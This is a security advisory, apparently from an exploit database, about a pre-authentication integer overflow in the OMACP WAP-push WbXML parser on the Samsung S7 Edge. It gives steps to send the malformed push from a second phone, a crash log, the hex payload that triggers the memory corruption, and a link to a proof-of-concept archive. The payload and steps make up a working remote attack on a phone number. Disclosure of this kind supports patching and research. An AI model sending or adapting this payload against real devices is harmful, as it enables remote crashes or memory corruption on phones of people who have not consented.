29 lines
No EOL
1.6 KiB
Text
29 lines
No EOL
1.6 KiB
Text
OMACP is a protocol supported by many mobile devices which allows them to receive provisioning information over the mobile network. One way to provision a device is via a WAP push SMS message containing provisioning information in WbXML.
|
|
|
|
A malformed OMACP WAP push message can cause memory corruption on a Samsung S7 Edge device when processing the String Extension portion of the WbXml payload. This is due to an integer overflow in memory allocation for this string.
|
|
|
|
While OMACP WAP pushes require authentication, the entire WbXml payload of a push is parsed to extract the credentials, so this bug occurs pre-authentication.
|
|
|
|
To reproduce the issue:
|
|
|
|
1) install the attached Android application on a different phone than the one being tested for the issue
|
|
2) manually give the application SMS permissions in the settings screen
|
|
3) start the app and enter the phone number on the target device
|
|
4) press the "send wap push" button
|
|
|
|
The target phone will crash:
|
|
|
|
02-20 15:52:56.952 15197 15197 F DEBUG : pid: 15180, tid: 15196, name: IntentService[S >>> com.wsomacp <<<
|
|
02-20 15:52:56.952 15197 15197 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x731a800000
|
|
|
|
The WAP payload causing this problem is:
|
|
|
|
690b6d0733b401506694f4c6504cf6be7224df6199a9c0ec4b76db1f6e262c457fc0553dbb50863dfce2d5c55077c3ffffffff7f777777770A0604B6B6B6B6.
|
|
|
|
Code for the test app is also attached.
|
|
|
|
This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most recent update on my device
|
|
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44724.zip |